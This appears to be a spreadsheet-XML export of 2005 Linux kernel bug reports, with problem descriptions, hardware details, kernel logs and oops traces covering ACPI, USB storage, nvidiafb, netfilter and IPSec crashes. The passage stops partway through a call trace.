    <t>Most recent kernel where this bug did not occur: 2.6.12 Distribution: vanilla (Gentoo) Hardware Environment: Dell Inspiron 9100, Intel Pentium 4 3.2GHz with w/HT stepping 9 Software Environment: gcc version 3.3.5-20050130 (Gentoo 3.3.5.20050130-r1, ssp-3.3.5.20050130-1, pie-8.7.7.1) Problem Description: Processes take in the order of 10 times longer to run when both cpus are online and max_cstate is greater than 1. Steps to reproduce: Boot with hyperthreading enabled (and see how long it takes to run init scripts). Loading processor module with max_cstate=1 or taking one cpu off line results in the processes running as expected. (Unloading processor module and reloading the module with a different max_cstate resulted in dswload-0304: *** Error looking up _CST in namespace: AE_ALREADY_EXISTS and a system hang such that MagicSysRq was ineffective but echo 1 &gt;| /sys/module/processor/parameters/max_cstate works fine.) When max_cstate &gt;= 2, processes still report 100% cpu. % cat /proc/acpi/processor/CPU0/power /proc/acpi/processor/CPU1/power active state: C1 max_cstate: C8 bus master activity: ffffffe9 states: *C1: type[C1] promotion[C2] demotion[--] latency[001] usage[00245832] C2: type[C2] promotion[C3] demotion[C1] latency[050] usage[00181279] C3: type[C3] promotion[--] demotion[C2] latency[050] usage[00000000] active state: C1 max_cstate: C8 bus master activity: 0200801d states: *C1: type[C1] promotion[C2] demotion[--] latency[001] usage[00115864] C2: type[C2] promotion[C3] demotion[C1] latency[050] usage[00469656] C3: type[C3] promotion[--] demotion[C2] latency[050] usage[00000000] Using PREEMPT_VOLUNTARY or PREEMPT_NONE instead of PREEMPT makes the behaviour more eratic - sometimes jobs seem to run as expected, but sometimes they take twice as long, so the average time is similar. Using HZ=250 instead of 1000 seems to make processes take even longer. There is a thin continuous sound of about 2kHz (I guess) during inactivity with HZ=1000. With HZ=250 the sound is either gone or blends in with the fans. This sound is the same that occurs with maxcpus=1 and hyperthreading enabled since at least Linux 2.6.11. (With hyperthreading disabled in the bios or max_cstate=1 the sound is not present.) With maxcpus=1 and HT enabled: % cat /proc/acpi/processor/CPU0/power active state: C2 max_cstate: C8 bus master activity: ffdffffd states: C1: type[C1] promotion[C2] demotion[--] latency[001] usage[00055200] *C2: type[C2] promotion[C3] demotion[C1] latency[050] usage[00338121] C3: type[C3] promotion[--] demotion[C2] latency[050] usage[00000000] With HT disabled: active state: C2 max_cstate: C8 bus master activity: 00000000 states: C1: type[C1] promotion[C2] demotion[--] latency[001] usage[00000010] *C2: type[C2] promotion[--] demotion[C1] latency[001] usage[00229907] The other notable difference the logs is the new message that occurs several times: acpi_bus-0212 [-12] acpi_bus_set_power : Device is not power manageable</t>
  </si>
  <si>
    <t>nvidiafb display corruption</t>
  </si>
  <si>
    <t>2.6.13 SMP (vanilla)</t>
  </si>
  <si>
    <t>2005-08-31 17:37 UTC</t>
  </si>
  <si>
    <t>Vadim Trochinsky</t>
  </si>
  <si>
    <t>2006-01-24 05:50 UTC</t>
  </si>
  <si>
    <t>Distribution: gentoo Hardware Environment: dual Athlon MP 2000+ nVidia 6800 video card CTX LCD FlatView P922E monitor Problem Description: When using nvidiafb the following happens: On setting the video mode, the kernel changes into a 1280x1024 video mode, which matches my LCD monitor. However, the display is shifted to the right, so that text begins at about half the monitor. The first 4 characters of each line are doubled, for instance "Hello world" would appear as "HellHello world". Some of the text that doesn't fit on the screen isn't visible, with the rest wrapping around and appearing on the left side of the screen. I have found a patch addressing an issue that sounds exactly like this for a laptop, however, as far as I can see, the 2.6.13 kernel already has that fix, but my problem happens anyway: http://www.mail-archive.com/git-commits-head%40vger.kernel.org/msg00081.html Steps to reproduce: enable nvidiafb, boot</t>
  </si>
  <si>
    <t>lm_sensors force Athlon64 (in quite&amp;cool mode) to run CPU fan</t>
  </si>
  <si>
    <t>Linux k900 2.6.8.1-10mdk</t>
  </si>
  <si>
    <t>2005-09-01 04:45 UTC</t>
  </si>
  <si>
    <t>Roberto Colmegna</t>
  </si>
  <si>
    <t>2005-09-16 08:11 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: NA Distribution: Mandrake 10.1 Hardware Environment: Athlon 64 3000+ with Quite&amp;cool enabled from BIOS Software Environment: NA Problem Description: Krn 2.6.8 correctly handle quite&amp;cool-mode on AMD Athlon64. If CPU have a small/no load the CPU-fan is disabled. But when the lm_sensors modules are loaded the CPU-fan immediatly start to run (the direct correlation load modules-&gt;fan run is reproducible everytime). If modules aren't load the CPU-fan run only in case of high CPU load. Steps to reproduce: - AMD Athlon 64 (MB ASUS A8V with VIA K8T800Pro + VT8237) - linux krn. 2.6.8 - lm_sensors</t>
  </si>
  <si>
    <t>Kernel BUG at "fs/exec.c":788</t>
  </si>
  <si>
    <t>2005-09-01 06:43 UTC</t>
  </si>
  <si>
    <t>2007-05-21 08:59 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Default RHEL AS4/U1 Kernel (2.6.9-11.ELsmp) Distribution: RHEL AS4/U1, but with a stock kernel from kernel.org Hardware Environment: Iwill H8501; http://www.iwill.net/product_2.asp?p_id=90&amp;sp=Y Software Environment: RHEL AS4/U1 Problem Description: When executing a piece of chemistry software, it crashes and the following message appears in the dmesg. ----------- [cut here ] --------- [please bite here ] --------- Kernel BUG at "fs/exec.c":788 invalid operand: 0000 [1] SMP CPU 8 Modules linked in: ipv6 autofs4 sunrpc dm_mod video button battery ac ohci_hcd hw_random e100 mii e1000 floppy ext3 jbd 3w_xxxx sd_mod scsi_mod Pid: 3786, comm: l1.exe Not tainted 2.6.13 RIP: 0010:[&lt;ffffffff8018e0c5&gt;] &lt;ffffffff8018e0c5&gt;{flush_old_exec+1573} RSP: 0018:ffff81053f347ce8 EFLAGS: 00010287 RAX: ffff81044387e8b8 RBX: 00000000ffffffb0 RCX: 00000000ffffffff RDX: ffff81044387e730 RSI: ffff8103439a5700 RDI: ffff81013fffc980 RBP: ffff810343890a80 R08: ffff81053f346000 R09: 0000000000000000 R10: 0000000000000200 R11: 00000000ffffffff R12: 0000000000000001 R13: ffff810749b13500 R14: ffff810749b13d08 R15: ffff8103439a5700 FS: 00002aaab1db9ee0(0000) GS:ffffffff80519c00(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b CR2: 000000000047374c CR3: 0000000749b23000 CR4: 00000000000006e0 Process l1.exe (pid: 3786, threadinfo ffff81053f346000, task ffff81044387e730) Stack: ffff81033fd9b0d0 0000000000000000 0000000100000000 ffff81033fd9b0d0 0000000000000080 ffff81013eac7800 ffff81000c038148 ffff81053f347d70 ffffffff80371102 ffffffff80182955 Call Trace:&lt;ffffffff80182955&gt;{vfs_read+341} &lt;ffffffff801b384f&gt;{load_elf_binary+1471} &lt;ffffffff80162a31&gt;{buffered_rmqueue+545} &lt;ffffffff8018d3d4&gt;{copy_strings+516} &lt;ffffffff801b3290&gt;{load_elf_binary+0} &lt;ffffffff8018ea59&gt;{search_binary_handler+201} &lt;ffffffff8018edbf&gt;{do_execve+415} &lt;ffffffff8010dc66&gt;{system_call+126} &lt;ffffffff8010c684&gt;{sys_execve+68} &lt;ffffffff8010e086&gt;{stub_execve+106} Code: 0f 0b a3 5d 4c 37 80 ff ff ff ff c2 14 03 65 48 8b 04 25 00 RIP &lt;ffffffff8018e0c5&gt;{flush_old_exec+1573} RSP &lt;ffff81053f347ce8&gt; &lt;3&gt;Debug: sleeping function called from invalid context at include/linux/rwsem.h:43 in_atomic():0, irqs_disabled():1 Call Trace:&lt;ffffffff8012ed3f&gt;{__might_sleep+191} &lt;ffffffff80137109&gt;{profile_task_exit+41} &lt;ffffffff80138a52&gt;{do_exit+34} &lt;ffffffff8024e0a5&gt;{do_unblank_screen+53} &lt;ffffffff8010f665&gt;{die+69} &lt;ffffffff8010fab1&gt;{do_invalid_op+145} &lt;ffffffff8018e0c5&gt;{flush_old_exec+1573} &lt;ffffffff8034f0a3&gt;{thread_return+0} &lt;ffffffff8034f0fb&gt;{thread_return+88} &lt;ffffffff8012f0c5&gt;{activate_task+149} &lt;ffffffff8010e785&gt;{error_exit+0} &lt;ffffffff8018e0c5&gt;{flush_old_exec+1573} &lt;ffffffff8018e0ac&gt;{flush_old_exec+1548} &lt;ffffffff80182955&gt;{vfs_read+341} &lt;ffffffff801b384f&gt;{load_elf_binary+1471} &lt;ffffffff80162a31&gt;{buffered_rmqueue+545} &lt;ffffffff8018d3d4&gt;{copy_strings+516} &lt;ffffffff801b3290&gt;{load_elf_binary+0} &lt;ffffffff8018ea59&gt;{search_binary_handler+201} &lt;ffffffff8018edbf&gt;{do_execve+415} &lt;ffffffff8010dc66&gt;{system_call+126} &lt;ffffffff8010c684&gt;{sys_execve+68} &lt;ffffffff8010e086&gt;{stub_execve+106} Steps to reproduce: Execute the piece of chemistry software</t>
  </si>
  <si>
    <t>USB subsystems hangs when stressing the bulk-only storage device</t>
  </si>
  <si>
    <t>2005-09-02 02:21 UTC</t>
  </si>
  <si>
    <t>Feng-sung Yang</t>
  </si>
  <si>
    <t>2005-10-12 07:34 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: None Distribution: Mandriva Linux release 2006.0 (Cooker) for i586 Hardware Environment: i686 Intel(R) Pentium(R) 4 CPU 3.00GHz Software Environment: Kernel tested: 2.6.13-rc7, 2.6.13 Problem Description: I write a test program to tests flash cards through card readers. All the flash cards are identical. The card readers are the same, too. This program relies on usb-storage to build the block devices for the flash card/card readers. Then read and write tests with O_SYNC open option are performed. If only one pair is tested, it seems okay. However, typically several pairs are tested simultaneously. Inside my program, each transfer unit of read() or write() is 64K bytes. The data is generated randomly. And the address is also randomly generated but guaranteed to be valid. After some long tests (about several hundreds MB for each pair), one pair may hang. That is, the I/O operation (read() or write()) never returns. Command lsusb will never return, either. Even if I unplugged all the card readers, the USB subsystem still hangs. And the block devices /dev/sdX are still present. By the ps command, it can be observed that all storage and scsi drivers are still present and one of them is blocked. The following is the ps result of tests for 4 pairs: [root@fsyang syslog]# ps -eo pid,tid,class,rtprio,ni,pri,psr,pcpu,stat,wchan:30,comm | grep scsi 8635 8635 TS - 0 19 0 0.0 S text.lock.scsi_error scsi_eh_35 8649 8649 TS - 0 19 0 0.0 S text.lock.scsi_error scsi_eh_36 8685 8685 TS - 0 24 0 0.0 S text.lock.scsi_error scsi_eh_37 8713 8713 TS - 0 24 0 0.0 D command_abort scsi_eh_38 [root@fsyang syslog]# ps -eo pid,tid,class,rtprio,ni,pri,psr,pcpu,stat,wchan:30,comm | grep usb 8636 8636 TS - 0 24 0 0.0 S text.lock.usb usb-storage 8650 8650 TS - 0 24 0 0.0 S text.lock.usb usb-storage 8687 8687 TS - 0 24 0 0.0 S text.lock.usb usb-storage 9202 9202 TS - 0 22 0 0.0 D+ text.lock.usb lsusb The following is the ver_linux result: Gnu C 4.0.1 Gnu make 3.80 binutils 2.16.91.0.2 util-linux 2.12q mount 2.12q module-init-tools 3.2-pre8 e2fsprogs 1.38 reiserfsprogs line reiser4progs line nfs-utils 1.0.7 Linux C Library 2.3.5 Dynamic linker (ldd) 2.3.5 Procps 3.2.5 Net-tools 1.60 Console-tools 0.2.3 Sh-utils 5.2.1 udev 068 Modules Loaded sd_mod usb_storage nfsd exportfs ipv6 nfs lockd nfs_acl sunrpc snd_pcm_oss snd_mixer_oss snd_intel8x0 snd_ac97_codec snd_pcm snd_timer snd soundcore snd_page_alloc sk98lin af_packet ide_cd loop vfat fat nls_cp950 ntfs intel_agp agpgart hw_random ata_piix libata scsi_mod ehci_hcd uhci_hcd usbcore ext3 jbd The following is the last few messages of /var/log/kernel/info: (The devices are 5-1.1, 5-1.2, 5-1.3, and 5-1.4. Only 5-1.4 failed to complete the testing) Sep 2 16:17:10 fsyang kernel: usb-storage: Command WRITE_10 (10 bytes) Sep 2 16:17:10 fsyang kernel: usb-storage: 2a 00 00 0f 11 00 00 00 80 00 Sep 2 16:17:10 fsyang kernel: usb-storage: Bulk Command S 0x43425355 T 0x2150 L 65536 F 0 Trg 0 LUN 0 CL 10 Sep 2 16:17:10 fsyang kernel: usb-storage: usb_stor_bulk_transfer_buf: xfer 31 bytes Sep 2 16:17:10 fsyang kernel: usb-storage: Status code 0; transferred 31/31 Sep 2 16:17:10 fsyang kernel: usb-storage: -- transfer complete Sep 2 16:17:10 fsyang kernel: usb-storage: Bulk command transfer result=0 Sep 2 16:17:10 fsyang kernel: usb-storage: usb_stor_bulk_transfer_sglist: xfer 65536 bytes, 16 entries Sep 2 16:17:10 fsyang kernel: usb-storage: Status code 0; transferred 65536/65536 Sep 2 16:17:10 fsyang kernel: usb-storage: -- transfer complete Sep 2 16:17:10 fsyang kernel: usb-storage: Bulk data transfer result 0x0 Sep 2 16:17:10 fsyang kernel: usb-storage: Attempting to get CSW... Sep 2 16:17:10 fsyang kernel: usb-storage: usb_stor_bulk_transfer_buf: xfer 13 bytes Sep 2 16:17:10 fsyang kernel: usb-storage: Status code 0; transferred 13/13 Sep 2 16:17:10 fsyang kernel: usb-storage: -- transfer complete Sep 2 16:17:10 fsyang kernel: usb-storage: Bulk status result = 0 Sep 2 16:17:10 fsyang kernel: usb-storage: Bulk Status S 0x53425355 T 0x2150 R 0 Stat 0x0 Sep 2 16:17:10 fsyang kernel: usb-storage: scsi cmd done, result=0x0 Sep 2 16:17:10 fsyang kernel: usb-storage: *** thread sleeping. Sep 2 16:17:10 fsyang kernel: usb-storage: queuecommand called Sep 2 16:17:10 fsyang kernel: usb-storage: *** thread awakened. Sep 2 16:17:10 fsyang kernel: usb-storage: Command WRITE_10 (10 bytes) Sep 2 16:17:10 fsyang kernel: usb-storage: 2a 00 00 0f 11 80 00 00 80 00 Sep 2 16:17:10 fsyang kernel: usb-storage: Bulk Command S 0x43425355 T 0x2151 L 65536 F 0 Trg 0 LUN 0 CL 10 Sep 2 16:17:10 fsyang kernel: usb-storage: usb_stor_bulk_transfer_buf: xfer 31 bytes Sep 2 16:17:10 fsyang kernel: usb-storage: Status code 0; transferred 31/31 Sep 2 16:17:10 fsyang kernel: usb-storage: -- transfer complete Sep 2 16:17:10 fsyang kernel: usb-storage: Bulk command transfer result=0 Sep 2 16:17:10 fsyang kernel: usb-storage: usb_stor_bulk_transfer_sglist: xfer 65536 bytes, 15 entries Sep 2 16:17:10 fsyang kernel: usb-storage: Status code -71; transferred 56832/65536 Sep 2 16:17:10 fsyang kernel: usb-storage: -- unknown error Sep 2 16:17:10 fsyang kernel: usb-storage: Bulk data transfer result 0x4 Sep 2 16:17:10 fsyang kernel: usb-storage: -- transport indicates error, resetting Sep 2 16:17:13 fsyang kernel: usb-storage: usb_reset_device returns -19 Sep 2 16:17:13 fsyang kernel: usb-storage: usb_stor_Bulk_reset called Sep 2 16:17:13 fsyang kernel: usb-storage: usb_stor_control_msg: rq=ff rqtype=21 value=0000 index=00 len=0 Sep 2 16:17:13 fsyang kernel: usb-storage: Soft reset failed: -19 Sep 2 16:17:13 fsyang kernel: usb-storage: scsi cmd done, result=0x70000 Sep 2 16:17:13 fsyang kernel: usb-storage: *** thread sleeping. Sep 2 16:17:13 fsyang kernel: usb-storage: queuecommand called Sep 2 16:17:13 fsyang kernel: usb-storage: *** thread awakened. Sep 2 16:17:13 fsyang kernel: usb-storage: Command WRITE_10 (10 bytes) Sep 2 16:17:13 fsyang kernel: usb-storage: 2a 00 00 0f 11 80 00 00 80 00 Sep 2 16:17:13 fsyang kernel: usb-storage: Bulk Command S 0x43425355 T 0x2152 L 65536 F 0 Trg 0 LUN 0 CL 10 Sep 2 16:17:13 fsyang kernel: usb-storage: usb_stor_bulk_transfer_buf: xfer 31 bytes Sep 2 16:17:13 fsyang kernel: usb-storage: Status code -19; transferred 0/31 Sep 2 16:17:13 fsyang kernel: usb-storage: -- unknown error Sep 2 16:17:13 fsyang kernel: usb-storage: Bulk command transfer result=4 Sep 2 16:17:13 fsyang kernel: usb-storage: -- transport indicates error, resetting Sep 2 16:17:13 fsyang kernel: usb-storage: unable to lock device for reset: -19 Sep 2 16:17:13 fsyang kernel: usb-storage: usb_stor_Bulk_reset called Sep 2 16:17:13 fsyang kernel: usb-storage: usb_stor_control_msg: rq=ff rqtype=21 value=0000 index=00 len=0 Sep 2 16:17:13 fsyang kernel: usb-storage: Soft reset failed: -19 Sep 2 16:17:13 fsyang kernel: usb-storage: scsi cmd done, result=0x70000 Sep 2 16:17:13 fsyang kernel: usb-storage: *** thread sleeping. Sep 2 16:17:13 fsyang kernel: usb-storage: queuecommand called Sep 2 16:17:13 fsyang kernel: usb-storage: *** thread awakened. Sep 2 16:17:13 fsyang kernel: usb-storage: Command WRITE_10 (10 bytes) Sep 2 16:17:13 fsyang kernel: usb-storage: 2a 00 00 0f 11 80 00 00 80 00 Sep 2 16:17:13 fsyang kernel: usb-storage: Bulk Command S 0x43425355 T 0x2153 L 65536 F 0 Trg 0 LUN 0 CL 10 Sep 2 16:17:13 fsyang kernel: usb-storage: usb_stor_bulk_transfer_buf: xfer 31 bytes Sep 2 16:17:13 fsyang kernel: usb-storage: Status code -19; transferred 0/31 Sep 2 16:17:13 fsyang kernel: usb-storage: -- unknown error Sep 2 16:17:13 fsyang kernel: usb-storage: Bulk command transfer result=4 Sep 2 16:17:13 fsyang kernel: usb-storage: -- transport indicates error, resetting Sep 2 16:17:13 fsyang kernel: usb-storage: unable to lock device for reset: -19 Sep 2 16:17:13 fsyang kernel: usb-storage: usb_stor_Bulk_reset called Sep 2 16:17:13 fsyang kernel: usb-storage: usb_stor_control_msg: rq=ff rqtype=21 value=0000 index=00 len=0 Sep 2 16:17:13 fsyang kernel: usb-storage: Soft reset failed: -19 Sep 2 16:17:13 fsyang kernel: usb-storage: scsi cmd done, result=0x70000 Sep 2 16:17:13 fsyang kernel: usb-storage: *** thread sleeping. Sep 2 16:17:13 fsyang kernel: usb-storage: queuecommand called Sep 2 16:17:13 fsyang kernel: usb-storage: *** thread awakened. Sep 2 16:17:13 fsyang kernel: usb-storage: Command WRITE_10 (10 bytes) Sep 2 16:17:13 fsyang kernel: usb-storage: 2a 00 00 0f 11 80 00 00 80 00 Sep 2 16:17:13 fsyang kernel: usb-storage: Bulk Command S 0x43425355 T 0x2154 L 65536 F 0 Trg 0 LUN 0 CL 10 Sep 2 16:17:13 fsyang kernel: usb-storage: usb_stor_bulk_transfer_buf: xfer 31 bytes Sep 2 16:17:13 fsyang kernel: usb-storage: Status code -19; transferred 0/31 Sep 2 16:17:13 fsyang kernel: usb-storage: -- unknown error Sep 2 16:17:13 fsyang kernel: usb-storage: Bulk command transfer result=4 Sep 2 16:17:13 fsyang kernel: usb-storage: -- transport indicates error, resetting Sep 2 16:17:13 fsyang kernel: usb-storage: unable to lock device for reset: -19 Sep 2 16:17:13 fsyang kernel: usb-storage: usb_stor_Bulk_reset called Sep 2 16:17:13 fsyang kernel: usb-storage: usb_stor_control_msg: rq=ff rqtype=21 value=0000 index=00 len=0 Sep 2 16:17:13 fsyang kernel: usb-storage: Soft reset failed: -19 Sep 2 16:17:13 fsyang kernel: usb-storage: scsi cmd done, result=0x70000 Sep 2 16:17:13 fsyang kernel: usb-storage: *** thread sleeping. Sep 2 16:17:13 fsyang kernel: usb-storage: queuecommand called Sep 2 16:17:13 fsyang kernel: usb 5-1.4: USB disconnect, address 50 Sep 2 16:17:13 fsyang kernel: usb-storage: storage_disconnect() called Sep 2 16:17:13 fsyang kernel: usb-storage: usb_stor_stop_transport called Sep 2 16:17:13 fsyang kernel: usb-storage: *** thread awakened. Sep 2 16:17:13 fsyang kernel: usb-storage: -- exiting Sep 2 16:17:18 fsyang kernel: usb-storage: command_abort called Sep 2 16:17:18 fsyang kernel: usb-storage: usb_stor_stop_transport called This log isn't affected by unplugging all the USB card readers. So I think the USB subsystem is dead... By the way, the possibility of failure depends on the host (PC) and hub used. So I think the hardware brand isn't the most important factor. The card reader seems not robust enough to recover from errors. Most of the devices under Kernel 2.6.12.5 will always fail (with messages "No such device or adderss", etc.) when several are tested simultaneously. By monitoring the USB bus, we know the device failed to respond correctly when errors happens. For example, it failed to ACK the bulk reset command or endlessly NAK the bulk in command. As a result, Kernel 2.6.12.5 will put it offline. Kernel 2.6.13 is better. However, isn't good enough. Sometimes still failed to recover from errors and I need to close the block device and reopen it for further testings. And this won't always solve the errors. For example, I re-opened the block device for 10 times and write() still failed. Then I gave up!</t>
  </si>
  <si>
    <t>can't read battery status - AE_NOT_FOUND</t>
  </si>
  <si>
    <t>2005-09-02 11:48 UTC</t>
  </si>
  <si>
    <t>Joshua N Pritikin</t>
  </si>
  <si>
    <t>2006-11-16 23:17 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: dunno, laptop is new Distribution: Debian stable/testing mix Hardware Environment: Acer TravelMate 2310 Problem Description: Battery charge status is not available. Steps to reproduce: acpid + gnome's Battery Charge Monitor Applet</t>
  </si>
  <si>
    <t>2.6.13-git3 won't compile on firewall</t>
  </si>
  <si>
    <t>2.6.13-git3</t>
  </si>
  <si>
    <t>2005-09-03 13:26 UTC</t>
  </si>
  <si>
    <t>2005-09-25 06:05 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur:2.6.12-8-686 (standard debian) Distribution:debian-sarge Hardware Environment:P3-800Mhz 256Mb RAM dual ethernet e100 IDE disk Software Environment: firewall (nat) Problem Description: kernel compile failes: make[2]: `arch/i386/kernel/asm-offsets.s' is up to date. CHK include/linux/compile.h CHK usr/initramfs_list GEN .version CHK include/linux/compile.h UPD include/linux/compile.h CC init/version.o LD init/built-in.o LD .tmp_vmlinux1 net/built-in.o: In function `ip_ct_port_tuple_to_nfattr': : undefined reference to `__nfa_fill' net/built-in.o: In function `ip_ct_port_tuple_to_nfattr': : undefined reference to `__nfa_fill' net/built-in.o: In function `tcp_to_nfattr': ip_conntrack_proto_tcp.c:(.text+0x5abf1): undefined reference to `__nfa_fill' net/built-in.o: In function `icmp_tuple_to_nfattr': ip_conntrack_proto_icmp.c:(.text+0x5c87f): undefined reference to `__nfa_fill' ip_conntrack_proto_icmp.c:(.text+0x5c8b0): undefined reference to `__nfa_fill' net/built-in.o:ip_conntrack_proto_icmp.c:(.text+0x5c8e1): more undefined references to `__nfa_fill' follow make[1]: *** [.tmp_vmlinux1] Error 1 make[1]: Leaving directory `/usr/src/linux-2.6.13-git3' make: *** [stamp-build] Error 2 Steps to reproduce: use this dotconfig file: http://www.dth.net/kernel/dotconfig-2.6.13-git3-firewall_wont_compile</t>
  </si>
  <si>
    <t>Kernel Panic with large ICMP packet over IPSec [potential DoS situation]</t>
  </si>
  <si>
    <t>2005-09-03 13:38 UTC</t>
  </si>
  <si>
    <t>Matt LaPlante</t>
  </si>
  <si>
    <t>2005-09-10 18:59 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.8-2-686 Distribution: Debian 3.1 Hardware Environment: Pentium II 400mhz, 256mb Software Environment: Problem Description: I've found what I believe is a potential DoS condition in IPSec using Debian but I need help isolating the culprit. First my system: Debian 3.1 stable with all updates as of 9/2. Custom Linux kernel 2.6.13 (no patches) IPTables 1.3.3 (no patches) Shorewall 2.4.3 I use my system as a multipurpose firewall/DHCP/DNS gateway on my broadband home connection. I have another system with the same specs on a remote network. Just recently I installed the racoon debian package on both machines and established an IPSec VPN tunnel between the two routers. All has worked generally as expected and I have connectivity between my local and remote LAN while having regular internet service running alongside. Here is my racoon-tool config: # # Configuration file for racoon-tool # # See racoon-tool.conf(5) for details # global: log: notify connection(test): src_range: 192.168.4.0/24 dst_range: 192.168.1.0/24 src_ip: A.B.C.D dst_ip: W.X.Y.Z authentication_algorithm: hmac_sha1 admin_status: yes peer(A.B.C.D): passive: off verify_identifier: on lifetime: time 30 min hash_algorithm[0]: sha1 encryption_algorithm[0]: aes my_identifier: address A.B.C.D peers_identifier: address W.X.Y.Z #### Now with this config, I can ping the remote LAN from my Win XP machine successfully using "ping -t -l 1024 192.168.1.2". I was just randomly messing around with some settings when I ran the following: "ping -t -l 2048 192.168.1.2" Now I'm well aware that this command won't likely succeed due to the excessive size of the packet (2048 bytes). What I wasn't expecting was that I would be totally and completely unable to access my router via SSH or have any internet connectivity. Yes, the oversize ping packet took down all the network connectivity on my router. Upon further inspection I noticed the packet had actually caused a kernel panic (visible only on the monitor, now also unresponsive). I shut down with a hard power down, rebooted, and tried again...with the dead same result. This oversize ping packet seems to repeatedly crash the system. I tried while booting the current Debian stock kernel (2.6.8-2-686), and this problem was NOT present. I think due to this, it is unlikely related to any supporting software on my system. I'm not sure where to proceed from here. I'd be glad to send in the kernel traces, but I don't know how to capture them...they aren't being logged anywhere that I can find, so I need to know how to capture them and submit them if they're necessary. I want to emphasize that this is somehow related to IPSec, as I tested the exact same command but substituted www.google.com for my remote LAN IP address and there were NO crashes/problems whatsoever. My reasoning for rating this bug with high severity is as follows: -It occurs reproducibly. -It occurs in the latest kernel with NO patches. -It did not occur with a previous kernel. -It causes a complete system failure. -It is extremely simple to exploit. I will gladly provide more details upon request. I'm not experienced enough at the low level system aspects to provide detailed debugging info from scratch, but I do have extensive experience with administering these systems so I can give any information necessary with a little guidance.</t>
  </si>
  <si>
    <t>pnp: PnPACPI: METHOD_NAME__CRS failure for PNP0401</t>
  </si>
  <si>
    <t>2005-09-05 08:49 UTC</t>
  </si>
  <si>
    <t>2006-07-30 09:39 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: Gentoo Linux Hardware Environment: MSI E7520 Master S2-M, i7520 chipset, 2x xeon Software Environment: Problem Description: I see in dmesg: Linux Plug and Play Support v0.97 (c) Adam Belay pnp: PnP ACPI init pnp: PnPACPI: METHOD_NAME__CRS failure for PNP0401 pnp: PnP ACPI: found 11 devices Steps to reproduce:</t>
  </si>
  <si>
    <t>ACPI - AML Alias command is broken</t>
  </si>
  <si>
    <t>2005-09-05 09:02 UTC</t>
  </si>
  <si>
    <t>The affected dsdt can be found at: http://www.renninger.de/acpi/dsdt.dsl Affected seems to be the compiler as well as the interpreter. Trying to compile the DSDT breaks with following message: ___________________________________ dsdt.dsl.alias_debug 2198: Store (NVGA, \GDGS) Error 1031 - Internal compiler error ^ (Missing alias link) dsdt.dsl.alias_debug 2211: If (LEqual (\GDGS, 0x00)) Error 1031 - Internal compiler error ^ (Missing alias link) dsdt.dsl.alias_debug 2215: Store (NVGA, \GDGS) Error 1031 - Internal compiler error ^ (Missing alias link)dsdt.dsl.alias_debug 2198: Store (NVGA, \GDGS) Error 1031 - Internal compiler error ^ (Missing alias link) dsdt.dsl.alias_debug 2211: If (LEqual (\GDGS, 0x00)) Error 1031 - Internal compiler error ^ (Missing alias link) dsdt.dsl.alias_debug 2215: Store (NVGA, \GDGS) Error 1031 - Internal compiler error ^ (Missing alias link) ________________________________________ The interpreter is affected as well, the kernel reports (/var/log/messages): exstoren-0142: *** Error: Store into Alias - should never happen psparse-1172: *** Error: Method execution failed [\_TZ_.RTMP] (Node df7ae528), AE_AML_INTERNAL psparse-1172: *** Error: Method execution failed [\_TZ_.THRM._TMP] (Node df7ae2e8), AE_AML_INTERNAL I could workaround the problem by replacing some aliases with the whole path. Not sure whether this is true, however the errors seem to vanish: When replacing the Alias definitions to the very beginning of the DSDT, no errors any more. Symptoms are: entire /proc/acpi/thermal_zone tree is missing and probably more. I could get the thermal_zone running by replacing the aliases in thermal zone code... It seems as if at the creation of the ALIAS_TYPE_LOCAL node the node that points to the real path is not created correctly? At least in asllookup.c, line 826 (compiler) in if (NextOp-&gt;Asl.Node) is NULL. The error probably is somewhere when the link is created?</t>
  </si>
  <si>
    <t>2.6.13-mm1</t>
  </si>
  <si>
    <t>IPSec related OOps in 2.6.13</t>
  </si>
  <si>
    <t>2005-09-06 03:49 UTC</t>
  </si>
  <si>
    <t>2005-10-01 12:41 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.12 Distribution: Slackware Software Environment: Linux gate 2.6.13 #1 Sat Sep 3 11:32:13 CEST 2005 i686 unknown Gnu C 3.3.5 Gnu make 3.80 binutils 2.15.92.0.2 util-linux 2.11z mount 2.11z module-init-tools 3.1 e2fsprogs 1.35 reiserfsprogs line reiser4progs line Linux C Library 2.3.5 Dynamic linker (ldd) 2.3.5 Linux C++ Library 5.0.7 Procps 3.1.8 Net-tools 1.60 Kbd 1.08 Sh-utils 2.0 Modules Loaded Problem Description: Oops: 0000 [#1] PREEMPT Modules linked in: CPU: 0 EIP: 0060:[&lt;c01f562c&gt;] Not tainted VLI EFLAGS: 00010216 (2.6.13) EIP is at sha1_update+0x7c/0x160 eax: dce92e6c ebx: 00000014 ecx: 00000005 edx: 00000104 esi: 907529d5 edi: dce92eb4 ebp: 907529d5 esp: c04c5c98 ds: 007b es: 007b ss: 0068 Process swapper (pid: 0, threadinfo=c04c5000 task=c03eeb80) Stack: dce92e74 dbe09db4 c04c5ca4 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 Call Trace: [&lt;c01f39e0&gt;] update+0x80/0xb0 [&lt;c01f4106&gt;] crypto_hmac_update+0x26/0x40 [&lt;c036d370&gt;] skb_icv_walk+0xf0/0x200 [&lt;c01f4071&gt;] crypto_hmac_init+0xd1/0x140 [&lt;c0348a23&gt;] esp_hmac_digest+0x93/0xf0 [&lt;c01f40e0&gt;] crypto_hmac_update+0x0/0x40 [&lt;c01f3644&gt;] cbc_encrypt+0x54/0x60 [&lt;c0347ecb&gt;] esp_output+0x38b/0x4a0 [&lt;c0366e1a&gt;] xfrm4_output+0x7a/0x1a0 [&lt;c031537b&gt;] ip_forward+0x17b/0x2e0 [&lt;c03154e0&gt;] ip_forward_finish+0x0/0x60 [&lt;c0313a96&gt;] ip_rcv+0x266/0x520 [&lt;c0313f30&gt;] ip_rcv_finish+0x0/0x2d0 